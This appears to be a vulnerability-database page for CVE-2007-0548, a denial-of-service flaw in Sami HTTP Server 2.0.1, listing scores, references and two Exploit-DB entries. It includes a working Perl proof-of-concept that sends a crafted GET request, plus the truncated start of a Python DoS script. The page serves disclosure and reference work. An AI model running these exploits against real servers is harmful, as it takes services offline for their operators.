CVE-2007-0548
published 2007-01-29CVE-2007-0548: KarjaSoft Sami HTTP Server 2.0.1 allows remote attackers to cause a denial of service (daemon hang) via a large number of requests for nonexistent objects.
PriorityP419medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.06%
85.9th percentile
KarjaSoft Sami HTTP Server 2.0.1 allows remote attackers to cause a denial of service (daemon hang) via a large number of requests for nonexistent objects.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| karjasoft | sami_http_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Sami HTTP Server 2.0.1 - GET Denial of Service
exploitdb·2010-11-05
CVE-2007-0548 Sami HTTP Server 2.0.1 - GET Denial of Service
Sami HTTP Server 2.0.1 - GET Denial of Service
---
#!/usr/bin/perl
# Exploit Titel: Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
# Date: 25.10.10
# Tool: Sami HTTP Server -- Version: 2.0.1
# Vendor-Website: http://www.karjasoft.com/old.php
# Download Link: http://www.karjasoft.com/files/samihttp/samihttpd_install.exe
# Author: wingthor
# Author-Website (German): http://www.wingthor.de
# Author-Email: [email protected]
# Tested on: Windows XP SP3
# Type: DOS/POC
use IO::Socket;
$target = "127.0.0.1";
$port = 80;
$payload = "GET /%n%n%n%n%n HTTP/1.1\r\n\r\n";
$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";
$sock->send($payload);
close($sock);
Exploit-DB
Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service
exploitdb·2007-01-23
CVE-2007-0548 Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service
Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service
---
#!/usr/bin/env python
import socket
print "-----------------------------------------------------------------------"
print "Sami HTTP Server HTTP 404 - Object not found Denial of Service"
print "url: http://www.karjasoft.com"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print ""
print "The server is unable to handle more than 2002 requests to nonexistents"
print "files, pages, folders etc."
print "When the number of requests exceed the 2002, it stops to answer,
stops"
print "to write to log file and the admin will be unable to kick or ban
users."
print "The only thing you can do is to kill the process."
print "-----------------------------------------
No writeups or analysis indexed.
http://osvdb.org/31623http://secunia.com/advisories/23901https://exchange.xforce.ibmcloud.com/vulnerabilities/31690https://www.exploit-db.com/exploits/3182http://osvdb.org/31623http://secunia.com/advisories/23901https://exchange.xforce.ibmcloud.com/vulnerabilities/31690https://www.exploit-db.com/exploits/3182
2007-01-29
Published